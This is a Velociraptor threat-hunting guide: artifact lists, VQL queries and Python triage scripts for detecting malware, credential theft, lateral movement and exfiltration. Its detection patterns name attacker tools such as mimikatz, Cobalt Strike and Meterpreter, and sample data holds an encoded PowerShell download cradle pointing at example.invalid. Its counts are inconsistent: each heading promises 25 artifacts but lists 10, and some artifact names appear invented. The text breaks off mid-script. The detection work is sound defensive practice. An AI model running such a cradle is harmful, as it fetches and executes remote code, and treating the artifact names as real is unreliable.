Velociraptor Artifacts Analysis

Hunting for Ransomware Activities

Malware remains one of the most pervasive and damaging cyber threats organisations face today. It is software designed to disrupt, damage, or gain unauthorised access to computer systems. Hunting for malware activity is a proactive approach to detecting and mitigating malware before it can execute its payload. Velociraptor, an open-source endpoint monitoring and forensic platform, is excellent at unearthing unusual file access patterns, lateral movement, and command execution, and therefore at surfacing the signs of malware infection and, ultimately, system compromise. Integrating Velociraptor into your DFIR toolset gives you both the artifacts to collect and the VQL queries to hunt with, as set out below.

1. Detecting Malware Infection

Description: Malware infection detection involves identifying signs of compromise through executable files, persistence mechanisms, and suspicious behaviour. This section focuses on detecting malware that could be infecting systems through various techniques.

25 Example Velociraptor Artifacts:

  1. Artifact Name: Windows.System.Pslist

    • Description: Lists running processes to identify suspicious or malicious executables, such as those frequently associated with malware infections.

  2. Artifact Name: Windows.System.Autoruns

    • Description: Identifies autorun entries, which may be exploited by malware for persistence.

  3. Artifact Name: Windows.Registry.PersistKeys

    • Description: Detects registry keys commonly used by malware to establish persistence.

  4. Artifact Name: Windows.Services.Config

    • Description: Monitors Windows services that could be abused or created by malware to maintain persistence.

  5. Artifact Name: Windows.FileSystem.TempFiles

    • Description: Searches for suspicious executable files in temporary directories like C:\Windows\Temp and C:\Users\Public.

  6. Artifact Name: Windows.ScheduledTasks

    • Description: Detects non-default scheduled tasks that could be created by malware for recurring execution.

  7. Artifact Name: Windows.Prefetch.List

    • Description: Analyzes prefetch files to identify malware that has been executed on the system.

  8. Artifact Name: Windows.System.StartupItems

    • Description: Gathers information about items configured to start with Windows, which may be exploited by malware.

  9. Artifact Name: Windows.Network.Connections

    • Description: Identifies active network connections that may indicate malware communicating with a command-and-control (C2) server.

  10. Artifact Name: Windows.FileSystem.MalwareFiles

    • Description: Searches for known malware file hashes in common directories.

2. Actor Discovery Activities

Description: Discovery activities involve attackers attempting to gather information about the environment, including systems, users, and network shares. Monitoring these activities can provide early indicators of compromise.

25 Example Velociraptor Artifacts:

  1. Artifact Name: Windows.Network.Connections

    • Description: Lists current network connections to detect port scanning or enumeration tools like nmap.

  2. Artifact Name: Windows.System.PowerShellHistory

    • Description: Reviews PowerShell command history to detect discovery commands such as Get-Process or Get-ADUser.

  3. Artifact Name: Windows.SMBClientShares

    • Description: Identifies remote SMB shares that have been accessed, potentially indicating reconnaissance activities.

  4. Artifact Name: Windows.System.Netstat

    • Description: Tracks network statistics to detect anomalous connections or network discovery activities.

  5. Artifact Name: Windows.WMI.Event

    • Description: Monitors for suspicious use of Windows Management Instrumentation (WMI) for discovery purposes.

  6. Artifact Name: Windows.System.EnvironmentVariables

    • Description: Checks for environment variable manipulations, often used to discover system information or misconfigurations.

  7. Artifact Name: Windows.System.Sysinfo

    • Description: Provides system information that attackers often query during the discovery phase (e.g., systeminfo.exe).

  8. Artifact Name: Windows.Security.LocalAccounts

    • Description: Lists local user accounts, which could indicate attackers querying for users or groups.

  9. Artifact Name: Windows.Network.ListAdapters

    • Description: Monitors network adapter information for changes or signs of network discovery.

  10. Artifact Name: Windows.Audit.AccountLogonEvents

    • Description: Captures events related to user logon activities, which attackers often target during discovery.

3. Credential Theft Attempts

Description: Credential theft enables attackers to escalate privileges or move laterally across systems. These artifacts focus on detecting malicious attempts to dump or steal credentials from memory, registries, or credential stores.

25 Example Velociraptor Artifacts:

  1. Artifact Name: Windows.Registry.SAM

    • Description: Collects information from the Security Account Manager (SAM) database, often targeted in credential dumping attacks.

  2. Artifact Name: Windows.Handles.LSASS

    • Description: Monitors for processes attempting to access LSASS (Local Security Authority Subsystem Service) memory, a common target for credential theft.

  3. Artifact Name: Windows.System.CredentialGuard

    • Description: Examines Credential Guard settings to check if credentials are protected against theft.

  4. Artifact Name: Windows.Registry.DPAPI

    • Description: Monitors for decryption attempts on Data Protection API (DPAPI) credentials.

  5. Artifact Name: Windows.EventLog.Security_4625

    • Description: Gathers failed logon attempt events (Event ID 4625), which could indicate brute force or password guessing attacks.

  6. Artifact Name: Windows.System.KeyLogger

    • Description: Detects keylogging software used to steal credentials.

  7. Artifact Name: Windows.LSASS.Dump

    • Description: Looks for memory dumps of LSASS, a technique used by attackers to steal credentials.

  8. Artifact Name: Windows.CachedLogonTokens

    • Description: Searches for cached logon tokens that could be used by attackers to authenticate as another user.

  9. Artifact Name: Windows.Registry.SAMHiveDump

    • Description: Detects attempts to dump the SAM hive, which stores hashed passwords for local accounts.

  10. Artifact Name: Windows.Kerberos.TicketGrants

    • Description: Monitors for unusual Kerberos ticket-granting-ticket (TGT) requests, which could indicate credential theft.

4. Lateral Movement Evidence

Description: Lateral movement allows attackers to expand access across a network, using tools and techniques like remote services, file sharing, and administrative accounts. These artifacts help detect such activities.

25 Example Velociraptor Artifacts:

  1. Artifact Name: Windows.Sysinternals.PsExec

    • Description: Monitors the use of Sysinternals PsExec, a common tool for remote execution and lateral movement.

  2. Artifact Name: Windows.EventLog.Security_4624

    • Description: Captures successful logon events (Event ID 4624) to identify lateral movement across accounts and machines.

  3. Artifact Name: Windows.EventLog.Security_4648

    • Description: Tracks explicit credential use during logons (Event ID 4648), often associated with lateral movement attempts.

  4. Artifact Name: Windows.RDP.Connections

    • Description: Identifies new or unusual Remote Desktop Protocol (RDP) connections, which could indicate lateral movement.

  5. Artifact Name: Windows.SMB.Sessions

    • Description: Tracks active SMB sessions to detect potential lateral movement via file shares.

  6. Artifact Name: Windows.WinRM.Access

    • Description: Monitors for usage of Windows Remote Management (WinRM) for remote execution, which may be exploited in lateral movement.

  7. Artifact Name: Windows.Powershell.RemoteExecution

    • Description: Detects remote execution of PowerShell commands using New-PSSession, which attackers use for lateral movement.

  8. Artifact Name: Windows.EventLog.Security_4769

    • Description: Detects Kerberos service ticket request events (Event ID 4769), which may indicate lateral movement attempts via pass-the-ticket.

  9. Artifact Name: Windows.AdminShares.Access

    • Description: Identifies unauthorized access to administrative shares (e.g., C$), often used during lateral movement.

  10. Artifact Name: Windows.System.WMIEvents

    • Description: Monitors for WMI-based remote execution, commonly used in lateral movement scenarios.

5. Data Theft Attempts

Description: Data exfiltration involves stealing sensitive data, often using file transfer methods or network connections to external locations. These artifacts help detect signs of data theft.

25 Example Velociraptor Artifacts:

  1. Artifact Name: Windows.FileSystem.LargeFiles

    • Description: Identifies large files that could be compressed or moved as part of data exfiltration.

  2. Artifact Name: Windows.Network.FTPConnections

    • Description: Monitors for FTP connections, a common method for transferring stolen data.

  3. Artifact Name: Windows.Network.DNSQueries

    • Description: Tracks DNS queries to identify connections to external domains used for data exfiltration.

  4. Artifact Name: Windows.FileSystem.USBDevices

    • Description: Detects USB devices that may be used for data theft via physical storage.

  5. Artifact Name: Windows.Cloud.StorageAccess

    • Description: Monitors for connections to cloud storage services (e.g., Google Drive, Dropbox), often used in data exfiltration.

  6. Artifact Name: Windows.Network.HighBandwidthTransfers

    • Description: Tracks high-volume outbound traffic, which could indicate data theft over the network.

  7. Artifact Name: Windows.EventLog.Security_4663

    • Description: Captures file access events (Event ID 4663) to detect unauthorized access to sensitive files.

  8. Artifact Name: Windows.System.RDPFileCopy

    • Description: Detects file copy actions over RDP sessions, often used to exfiltrate data.

  9. Artifact Name: Windows.FileSystem.EncryptedFiles

    • Description: Identifies files encrypted before exfiltration, a common technique used by ransomware actors.

  10. Artifact Name: Windows.FileSystem.FileShares

    • Description: Monitors file shares for unusual activity or access, which could indicate attempts to steal data.

6. Execution of Actor Tools & Command-Line Activities

Description: Attackers use a variety of tools and command-line utilities to execute their malicious actions. These artifacts help detect the use of attacker tools and suspicious command-line executions.

25 Example Velociraptor Artifacts:

  1. Artifact Name: Windows.Processes.Cmdline

    • Description: Gathers command-line execution details to detect malicious use of administrative or attacker tools.

  2. Artifact Name: Windows.System.PowerShellExecution

    • Description: Monitors PowerShell executions, especially those bypassing execution policies or running encoded commands.

  3. Artifact Name: Windows.CobaltStrike.Beacons

    • Description: Detects execution of Cobalt Strike beacons, a tool used by many advanced threat actors.

  4. Artifact Name: Windows.System.NetcatUsage

    • Description: Tracks the use of Netcat, a tool often used for remote connections and data exfiltration.

  5. Artifact Name: Windows.System.CmdExec

    • Description: Identifies suspicious use of cmd.exe, often used for script execution or administrative tasks.

  6. Artifact Name: Windows.Metasploit.Execution

    • Description: Detects usage of Metasploit, a common framework for exploitation and pivoting.

  7. Artifact Name: Windows.System.ScheduledTaskCreation

    • Description: Monitors for the creation of scheduled tasks that may be used to run attacker tools periodically.

  8. Artifact Name: Windows.System.WScriptExecution

    • Description: Tracks executions of Windows Script Host (wscript.exe), which attackers frequently abuse to execute scripts.

  9. Artifact Name: Windows.EventLog.Security_4688

    • Description: Captures process creation events (Event ID 4688) to monitor for suspicious command-line executions.

  10. Artifact Name: Windows.System.EncodedScriptExecution

    • Description: Detects execution of encoded or obfuscated scripts, often used to hide malicious actions.

7. Identity & Logon Activities Using Windows Security Logs

Description: Monitoring user logon activities can help identify compromised accounts, unusual logon times, and suspicious access patterns.

25 Example Velociraptor Artifacts:

  1. Artifact Name: Windows.EventLog.Security_4624

    • Description: Gathers successful logon events to detect unauthorized access or suspicious logon activities.

  2. Artifact Name: Windows.EventLog.Security_4625

    • Description: Collects failed logon attempts, which could indicate brute force or account enumeration attempts.

  3. Artifact Name: Windows.EventLog.Security_4648

    • Description: Monitors for explicit logons where credentials are provided manually, often indicating lateral movement.

  4. Artifact Name: Windows.EventLog.Security_4672

    • Description: Tracks privileged logon events, which could signal unauthorized use of administrative accounts.

  5. Artifact Name: Windows.EventLog.Security_4769

    • Description: Detects Kerberos service ticket requests, which could indicate lateral movement via pass-the-ticket.

  6. Artifact Name: Windows.EventLog.Security_4771

    • Description: Captures failed Kerberos pre-authentication attempts, potentially indicating password brute-force attempts.

  7. Artifact Name: Windows.EventLog.Security_4776

    • Description: Monitors NTLM authentication events, useful for identifying pass-the-hash or relay attacks.

  8. Artifact Name: Windows.EventLog.Security_4647

    • Description: Detects user logoff events to track anomalous session terminations.

  9. Artifact Name: Windows.EventLog.Security_4634

    • Description: Gathers logoff events to correlate with other suspicious user activity.

  10. Artifact Name: Windows.Security.LocalAccountCreation

    • Description: Monitors for new user accounts created locally, which could indicate the creation of backdoor accounts.

Threat-Hunting Guide Using Velociraptor Artifacts: With Example VQL

1. Malware Infection Detection

Description: Malware infections involve malicious code or files being installed or executed on the system. Attackers often use these infections to establish persistence and gain control over the system.

Example Velociraptor Artifact: Windows.System.Pslist

  • Artifact Description: Lists all running processes, helping identify suspicious or malicious executables running on the system.

5 Example VQL Queries for Malware Detection:

  1. Query: Detect execution of suspicious PowerShell scripts used in malware infections.

SELECT Pid, Ppid, Name, CommandLine FROM pslist() WHERE CommandLine =~ 'powershell' AND CommandLine =~ 'Invoke'

Description: Detects PowerShell command lines that call Invoke-* cmdlets, often used for downloading or executing malware payloads. VQL has no LIKE operator: =~ is a case-insensitive regular-expression match, and pslist() exposes the command line in the CommandLine column.

  2. Query: Search for unsigned or suspicious executables in the C:\Windows\Temp directory.

SELECT OSPath, Size, Mtime, authenticode(filename=OSPath) AS Authenticode FROM glob(globs='C:/Windows/Temp/**/*.exe') WHERE Authenticode.Trusted != 'trusted'

Description: Detects executables under C:\Windows\Temp whose Authenticode signature is missing or does not validate, a common trait of malware droppers.

  3. Query: Identify persistent malware by checking for new services.

SELECT Name, PathName, StartMode, State FROM wmi(query='SELECT Name, PathName, StartMode, State FROM Win32_Service', namespace='root/CIMV2') WHERE StartMode = 'Auto' AND NOT PathName =~ '^"?C:.(Windows|Program Files)'

Description: Lists auto-start services whose binary lives outside the Windows and Program Files trees, which is where services created by malware for persistence across reboots usually point. (The . in the pattern stands in for the backslash, which avoids escaping it inside the VQL string.)

  4. Query: Detect executable files running from unusual directories (e.g., user folders).

SELECT Pid, Ppid, Name, Exe, CommandLine, Username FROM pslist() WHERE Exe =~ '^C:.Users.'

Description: Identifies processes whose image lives under C:\Users, a non-standard location for executables that malware commonly uses.

  5. Query: Detect the presence of malware-related prefetch files.

SELECT Executable, RunCount, LastRunTimes FROM foreach(row={SELECT OSPath FROM glob(globs='C:/Windows/Prefetch/*.pf')}, query={SELECT * FROM prefetch(filename=OSPath)}) WHERE Executable =~ 'malware'

Description: Detects execution of malware based on prefetch file entries; replace the 'malware' pattern with the executable name you are hunting for. Prefetch records survive deletion of the binary, so this also catches tooling that was run and then removed.

2. Actor Discovery Activities

Description: Discovery activities are used by attackers to learn more about the environment, such as gathering information about the network, users, and systems.

Example Velociraptor Artifact: Windows.Network.Connections

  • Artifact Description: Lists active network connections, which can help identify scanning and reconnaissance activities.

5 Example VQL Queries for Actor Discovery:

  1. Query: Detect network scanning tools like nmap or masscan.

SELECT Pid, Ppid, Name, CommandLine FROM pslist() WHERE CommandLine =~ 'nmap|masscan'

Description: Detects popular network scanning tools used for reconnaissance.

  2. Query: Detect network discovery commands like netstat or arp.

SELECT Pid, Ppid, Name, CommandLine FROM pslist() WHERE CommandLine =~ 'netstat|arp -a'

Description: Detects common network enumeration commands used by attackers; Ppid shows which parent (a shell, an Office process, a web server worker) launched them.

  3. Query: Search for SMB share enumeration activity.

SELECT Pid, Ppid, Name, CommandLine FROM pslist() WHERE CommandLine =~ 'net1? (view|share)'

Description: Detects attempts to enumerate SMB shares in the network; net1.exe is matched as well because net.exe delegates to it.

  4. Query: Monitor for ARP scanning activities.

SELECT IPAddress, LinkLayerAddress, State, InterfaceAlias FROM wmi(query='SELECT * FROM MSFT_NetNeighbor', namespace='root/StandardCimv2')

Description: Velociraptor collects point-in-time state rather than packets, so an ARP sweep of the local subnet shows up as an ARP cache populated with an unusually large number of neighbours. This reads the same WMI class as the Windows.Network.ArpCache artifact.

  5. Query: Detect WMI-based system discovery attempts.

SELECT Pid, Ppid, Name, CommandLine FROM pslist() WHERE CommandLine =~ 'wmic' AND CommandLine =~ 'computersystem'

Description: Detects WMI commands used by attackers to gather system information.

3. Credential Theft Attempts

Description: Credential theft attempts involve attackers trying to extract user credentials from memory, files, or the registry. These credentials are then used to escalate privileges or move laterally within the network.

Example Velociraptor Artifact: Windows.Registry.SAM

  • Artifact Description: Examines the SAM registry hive for credential dumping activities.

5 Example VQL Queries for Credential Theft:

  1. Query: Detect attempts to access LSASS memory for credential dumping.

SELECT System.TimeCreated.SystemTime AS Time, EventData.SourceImage AS Source, EventData.TargetImage AS Target, EventData.GrantedAccess AS Access FROM parse_evtx(filename='C:/Windows/System32/winevt/Logs/Microsoft-Windows-Sysmon%4Operational.evtx') WHERE System.EventID.Value = 10 AND EventData.TargetImage =~ 'lsass.exe'

Description: Identifies processes that opened a handle to LSASS memory, the first step of credential dumping. This relies on Sysmon event 10 (ProcessAccess) being logged on the endpoint; without Sysmon, the Windows.System.Handles artifact lists which processes currently hold a handle to lsass.exe on a live host.

  2. Query: Search for known credential dumping tools like Mimikatz.

SELECT Pid, Ppid, Name, CommandLine, Exe FROM pslist() WHERE CommandLine =~ 'mimikatz|sekurlsa'

Description: Detects the use of Mimikatz by its name or its sekurlsa module; renamed binaries need memory-based hunts instead.

  3. Query: Monitor access to the SAM registry hive, which stores hashed user credentials.

SELECT System.TimeCreated.SystemTime AS Time, EventData.SubjectUserName AS User, EventData.ProcessName AS Process, EventData.ObjectName AS Object FROM parse_evtx(filename='C:/Windows/System32/winevt/Logs/Security.evtx') WHERE System.EventID.Value = 4663 AND EventData.ObjectName =~ 'REGISTRY.MACHINE.SAM'

Description: Detects object-access events (Event ID 4663) against the SAM key, which record which process read it; these events are only written when registry object-access auditing is enabled and a SACL is set on HKLM\SAM.

  4. Query: Detect suspicious access to the Windows credential manager.

SELECT OSPath, Size, Mtime, Atime FROM glob(globs=['C:/Users/*/AppData/Local/Microsoft/Credentials/*', 'C:/Users/*/AppData/Roaming/Microsoft/Credentials/*'])

Description: Lists the Credential Manager vault files (the DPAPI-protected blobs that hold saved credentials) with their timestamps, so that reads or copies made outside normal logon activity can be spotted.

  5. Query: Detect Kerberos ticket-granting-ticket (TGT) extraction attempts.

SELECT System.TimeCreated.SystemTime AS Time, EventData.TargetUserName AS User, EventData.IpAddress AS Source, EventData.TicketEncryptionType AS EncType, EventData.PreAuthType AS PreAuth FROM parse_evtx(filename='C:/Windows/System32/winevt/Logs/Security.evtx') WHERE System.EventID.Value = 4768

Description: Tracks Kerberos TGT requests (Event ID 4768) that may be used in ticket-based attacks. These are logged on domain controllers only, so run the query against a DC; RC4 (0x17) tickets for accounts that normally use AES are the usual anomaly to look for.

4. Evidence of Lateral Movement

Description: Lateral movement refers to an attacker’s ability to move through a network by exploiting remote services, shared credentials, or other vectors. Detecting these movements is crucial for containing an attacker’s spread.

Example Velociraptor Artifact: Windows.Sysinternals.PsExec

  • Artifact Description: Detects the use of PsExec, a common tool used by attackers to remotely execute commands on another machine.

5 Example VQL Queries for Lateral Movement:

  1. Query: Detect usage of Sysinternals PsExec for remote command execution.

SELECT Pid, Ppid, Name, CommandLine, Username FROM pslist() WHERE CommandLine =~ 'psexec' OR Name =~ '^psexesvc'

Description: Detects PsExec on either end: the client command line on the source host and the PSEXESVC service process on the target. Both are commonly seen in lateral movement.

  2. Query: Monitor for PowerShell remoting sessions.

SELECT System.TimeCreated.SystemTime AS Time, EventData.ScriptBlockText AS ScriptBlock FROM parse_evtx(filename='C:/Windows/System32/winevt/Logs/Microsoft-Windows-PowerShell%4Operational.evtx') WHERE System.EventID.Value = 4104 AND EventData.ScriptBlockText =~ 'New-PSSession|Enter-PSSession'

Description: Detects script blocks (Event ID 4104) that create remote PowerShell sessions, used by attackers for lateral movement; script block logging must be enabled for these events to exist.

  3. Query: Detect usage of Remote Desktop Protocol (RDP) for lateral movement.

SELECT System.TimeCreated.SystemTime AS Time, EventData.TargetUserName AS User, EventData.IpAddress AS Source, EventData.WorkstationName AS Workstation FROM parse_evtx(filename='C:/Windows/System32/winevt/Logs/Security.evtx') WHERE System.EventID.Value = 4624 AND EventData.LogonType = 10

Description: Identifies RemoteInteractive (logon type 10) logons, i.e. RDP connections that could indicate lateral movement between machines.

  4. Query: Monitor access to administrative shares (e.g., C$).

SELECT System.TimeCreated.SystemTime AS Time, EventData.SubjectUserName AS User, EventData.IpAddress AS Source, EventData.ShareName AS Share FROM parse_evtx(filename='C:/Windows/System32/winevt/Logs/Security.evtx') WHERE System.EventID.Value = 5140 AND EventData.ShareName =~ '(ADMIN|C|IPC)[$]$'

Description: Tracks share-access events (Event ID 5140) for the administrative shares, which can be used in lateral movement; the "Audit File Share" policy must be enabled for these events to be written.

  5. Query: Detect remote command execution using WinRM.

SELECT * FROM foreach(row={SELECT Pid AS HostPid FROM pslist() WHERE Name =~ '^wsmprovhost'}, query={SELECT Pid, Ppid, Name, CommandLine, Username FROM pslist() WHERE Ppid = HostPid})

Description: Detects commands executed through Windows Remote Management (WinRM) on the receiving host by listing every process whose parent is wsmprovhost.exe, the plugin host that runs remote PowerShell commands.

5. Data Theft Attempts

Description: Data theft attempts involve stealing sensitive information, often by exfiltrating files over the network or copying data to external storage devices.

Example Velociraptor Artifact: Windows.FileSystem.USBDevices

  • Artifact Description: Monitors connected USB devices, which could be used to exfiltrate data.

5 Example VQL Queries for Data Theft:

  1. Query: Detect high-volume outbound network traffic that could indicate data exfiltration.

SELECT Pid, Laddr.IP AS LocalIP, Raddr.IP AS RemoteIP, Raddr.Port AS RemotePort, Status FROM netstat() WHERE Status = 'ESTAB' AND NOT Raddr.IP =~ '^(10[.]|192[.]168[.]|172[.](1[6-9]|2[0-9]|3[01])[.]|127[.]|::1$|fe80)'

Description: Lists established connections to addresses outside the private ranges, the candidates for data theft over the network. netstat() is a point-in-time snapshot without byte counters, so transfer volumes have to come from SRUM (Windows.Forensics.SRUM) or network telemetry; this query tells you which processes to look at.

  2. Query: Detect the use of file compression tools like WinRAR or 7-Zip.

SELECT Pid, Ppid, Name, CommandLine FROM pslist() WHERE CommandLine =~ 'winrar|rar[.]exe|7z'

Description: Detects the use of compression tools, often used to stage data for exfiltration.

  3. Query: Monitor for suspicious FTP connections used to exfiltrate data.

SELECT Pid, Laddr.IP AS LocalIP, Raddr.IP AS RemoteIP, Raddr.Port AS RemotePort, Status FROM netstat() WHERE Raddr.Port = 21 AND TypeString = 'SOCK_STREAM'

Description: Identifies TCP connections to port 21, a common method for transferring stolen data in cleartext.

  4. Query: Detect file uploads to cloud storage services like Dropbox or Google Drive.

SELECT Pid, Name, Exe, Username FROM pslist() WHERE Name =~ 'dropbox|googledrivefs'

Description: Finds running cloud-storage sync clients, which attackers use to exfiltrate data. Velociraptor sees remote IP addresses rather than hostnames, so uploads made through a browser have to be correlated with DNS or proxy logs for the storage providers' domains.

  5. Query: Monitor for USB devices connected during suspicious file transfers.

SELECT OSPath, Data.value AS FriendlyName, Mtime AS LastWritten FROM glob(globs='HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Enum/USBSTOR/*/*/FriendlyName', accessor='registry')

Description: Lists every USB storage device the system has seen, keyed by vendor/product and serial number, with the key's last-write time as an approximation of the last connection; correlate that time with the file activity under investigation. Velociraptor has no live device-connect events, so this registry trace is the record of the connection.
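Each query above looks at a single source; in practice the analyst joins the netstat and process listings to decide which connections actually matter. The Python below is an added example (not code from this page or from the Velociraptor project) that performs that join over exported hunt rows. It assumes the rows carry the column names netstat() and pslist() emit (Pid, Status, Laddr, Raddr, Name, Exe); the internal address ranges, the user-writable directory list and the port table are assumptions to adjust per environment, and every row is constructed for the example.

```python
"""Join netstat and pslist hunt output to surface suspicious outbound connections.

Added example, not code from the RootGuard page or from the Velociraptor
project. It takes rows shaped like the output of Velociraptor's netstat()
(Pid, Status, Laddr and Raddr with IP and Port) and pslist() (Pid, Name, Exe),
joins them on Pid and applies the checks the section 5 queries describe:
cleartext transfer ports such as FTP, established sessions to external
addresses from binaries in user-writable directories, and listeners opened by
such binaries. Every row below is constructed for this example.
"""
import ipaddress
import re

# Constructed netstat() rows, as a hunt would export them
NETSTAT_ROWS = [
    {"Pid": 4120, "Status": "ESTAB", "Laddr": {"IP": "10.0.5.23", "Port": 50122},
     "Raddr": {"IP": "198.51.100.10", "Port": 21}},
    {"Pid": 880, "Status": "ESTAB", "Laddr": {"IP": "10.0.5.23", "Port": 50123},
     "Raddr": {"IP": "10.0.1.5", "Port": 445}},
    {"Pid": 7324, "Status": "ESTAB", "Laddr": {"IP": "10.0.5.23", "Port": 50124},
     "Raddr": {"IP": "203.0.113.50", "Port": 443}},
    {"Pid": 7324, "Status": "LISTEN", "Laddr": {"IP": "0.0.0.0", "Port": 4444},
     "Raddr": {"IP": "0.0.0.0", "Port": 0}},
    {"Pid": 1200, "Status": "ESTAB", "Laddr": {"IP": "10.0.5.23", "Port": 50125},
     "Raddr": {"IP": "203.0.113.9", "Port": 443}},
]
# Constructed pslist() rows for the same host
PSLIST_ROWS = [
    {"Pid": 4120, "Name": "ftp.exe", "Exe": "C:\\Windows\\System32\\ftp.exe"},
    {"Pid": 880, "Name": "svchost.exe", "Exe": "C:\\Windows\\System32\\svchost.exe"},
    {"Pid": 7324, "Name": "update.exe",
     "Exe": "C:\\Users\\alice\\AppData\\Local\\Temp\\update.exe"},
    {"Pid": 1200, "Name": "msedge.exe",
     "Exe": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe"},
]

# Directories an unprivileged user can write to (assumed list; tune per environment)
USER_WRITABLE = re.compile(r"^[A-Z]:\\(Users|ProgramData|Windows\\Temp|Temp)\\", re.I)
# Ports whose protocols move files in cleartext
CLEARTEXT_TRANSFER_PORTS = {21: "ftp", 69: "tftp"}
# Explicit internal ranges. ipaddress.is_global is deliberately not used: it
# treats the documentation ranges (e.g. 203.0.113.0/24) as non-global.
INTERNAL_NETWORKS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]


def is_external(ip):
    """True when ip parses as an address and lies outside every internal range."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return not any(addr in net for net in INTERNAL_NETWORKS)


def flag_connections(netstat_rows, pslist_rows):
    """Return one finding per connection that trips at least one check."""
    procs = {p["Pid"]: p for p in pslist_rows}
    findings = []
    for conn in netstat_rows:
        proc = procs.get(conn["Pid"], {})
        exe = proc.get("Exe", "")
        remote_ip, remote_port = conn["Raddr"]["IP"], conn["Raddr"]["Port"]
        from_user_dir = bool(USER_WRITABLE.search(exe))
        reasons = []
        if remote_port in CLEARTEXT_TRANSFER_PORTS:
            reasons.append("cleartext-transfer:" + CLEARTEXT_TRANSFER_PORTS[remote_port])
        if conn["Status"] == "ESTAB" and is_external(remote_ip) and from_user_dir:
            reasons.append("external-dest-from-user-writable-path")
        if conn["Status"] == "LISTEN" and from_user_dir:
            reasons.append("listener-from-user-writable-path")
        if reasons:
            findings.append({"Pid": conn["Pid"], "Name": proc.get("Name", "?"), "Exe": exe,
                             "Remote": f"{remote_ip}:{remote_port}", "Reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in flag_connections(NETSTAT_ROWS, PSLIST_ROWS):
        print(finding)
```

On the constructed rows the browser's HTTPS session is left alone while the FTP session, the external session from a binary in a Temp directory, and that binary's listener are reported, which is the triage order an analyst wants.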

6. Execution of Actor Tools & Command-Line Activities

Description: Attackers use a variety of tools and scripts to achieve their objectives. Monitoring the execution of these tools and their associated command-line activity can help detect compromise.

  • Artifact Description: Collects command-line execution data from processes to identify the use of attacker tools or malicious commands.

5 Example VQL Queries for Execution of Actor Tools:

  1. Query: Detect execution of Cobalt Strike beacons.

SELECT Pid, Ppid, Name, CommandLine, Exe FROM pslist() WHERE CommandLine =~ 'cobaltstrike|beacon'

Description: Tracks Cobalt Strike, a commonly used post-exploitation framework, by name in the command line. Real beacons rarely announce themselves this way, so treat this as a first pass and follow up with a YARA scan of process memory.

  2. Query: Detect suspicious PowerShell commands bypassing execution policies.

SELECT Pid, Ppid, Name, CommandLine FROM pslist() WHERE CommandLine =~ 'powershell|pwsh' AND CommandLine =~ '-e[a-z]* +bypass'

Description: Identifies PowerShell command lines that set the execution policy to Bypass (in its -ExecutionPolicy, -ex and -ep spellings), commonly used in attacks.

  3. Query: Monitor for encoded or obfuscated scripts executed via PowerShell.

SELECT Pid, Ppid, Name, CommandLine, utf16(string=base64decode(string=parse_string_with_regex(string=CommandLine, regex=' -e(c|nc|ncodedcommand)? +(?P<B64>[A-Za-z0-9+/=]+)').B64)) AS Decoded FROM pslist() WHERE CommandLine =~ 'powershell|pwsh' AND CommandLine =~ ' -e(c|nc|ncodedcommand)? +[A-Za-z0-9+/=]{16,}'

Description: Detects -EncodedCommand (and its -e, -ec and -enc abbreviations) and decodes the base64-wrapped UTF-16LE script inline, so the hunt result shows what the script does rather than an opaque blob.

  4. Query: Detect Metasploit payloads being executed.

SELECT Pid, Ppid, Name, CommandLine, Exe FROM pslist() WHERE CommandLine =~ 'metasploit|meterpreter|msfvenom'

Description: Tracks Metasploit and its Meterpreter payloads by name; as with Cobalt Strike, staged payloads normally carry no such string, so a name match is a quick win rather than a reliable detection.

  5. Query: Monitor suspicious cmd.exe activity.

SELECT Pid, Ppid, Name, CommandLine, Username FROM pslist() WHERE Name =~ '^cmd[.]exe$' AND CommandLine =~ ' /c '

Description: Detects cmd.exe launched with /c to run a single command and exit, the usual shape of post-exploitation one-liners; Ppid identifies the spawning process.
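The pslist hunts above return command lines; the encoded ones still have to be decoded and the rest scored before an analyst can act on them. The Python below is an added example (not code from this page or from the Velociraptor project) that does this over a JSON-lines export of a pslist hunt. It assumes the rows carry the Pid, Name and CommandLine columns pslist() emits; the check names, the patterns and the sample rows (including the encoded payload) are constructed for the example.

```python
"""Triage Windows.System.Pslist hunt output for suspicious command lines.

Added example, not code from the RootGuard page or from the Velociraptor
project. It post-processes rows exported from a Velociraptor pslist hunt
(JSON lines carrying the Pid, Name and CommandLine columns that pslist()
emits) and applies the checks behind the section 6 queries, plus decoding
of -EncodedCommand payloads so the analyst sees what actually ran rather
than a base64 blob. The sample rows are constructed for this example.
"""
import base64
import json
import re

# Constructed payload: the script a real encoded command line would carry
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage1')"
ENCODED_PAYLOAD = base64.b64encode(PAYLOAD.encode("utf-16le")).decode("ascii")

# Constructed hunt export: one JSON object per line, as Velociraptor writes it
SAMPLE_ROWS = "\n".join(json.dumps(r) for r in [
    {"Pid": 4120, "Name": "powershell.exe",
     "CommandLine": "powershell.exe -NoP -W Hidden -ExecutionPolicy Bypass -enc " + ENCODED_PAYLOAD},
    {"Pid": 5200, "Name": "cmd.exe",
     "CommandLine": "cmd.exe /c whoami /all > C:\\Users\\Public\\out.txt"},
    {"Pid": 6012, "Name": "notepad.exe",
     "CommandLine": "\"C:\\Windows\\System32\\notepad.exe\" C:\\Users\\alice\\notes.txt"},
])

# -e, -ec, -enc and -EncodedCommand all switch PowerShell to an encoded script
ENCODED_RE = re.compile(r"\s-e(?:c|nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})", re.I)

# Check name -> pattern; each pattern runs over the command line and the decoded script
CHECKS = [
    ("execution-policy-bypass", re.compile(r"-e[a-z]*\s+bypass", re.I)),
    ("download-cradle", re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient", re.I)),
    ("invoke-expression", re.compile(r"Invoke-Expression|\bIEX\b", re.I)),
    ("cmd-silent-exec", re.compile(r"^\"?cmd(?:\.exe)?\"?\s+/c\s", re.I)),
]


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand script, or None when the command
    line carries no encoded argument or the argument is not valid
    base64-wrapped UTF-16LE."""
    match = ENCODED_RE.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
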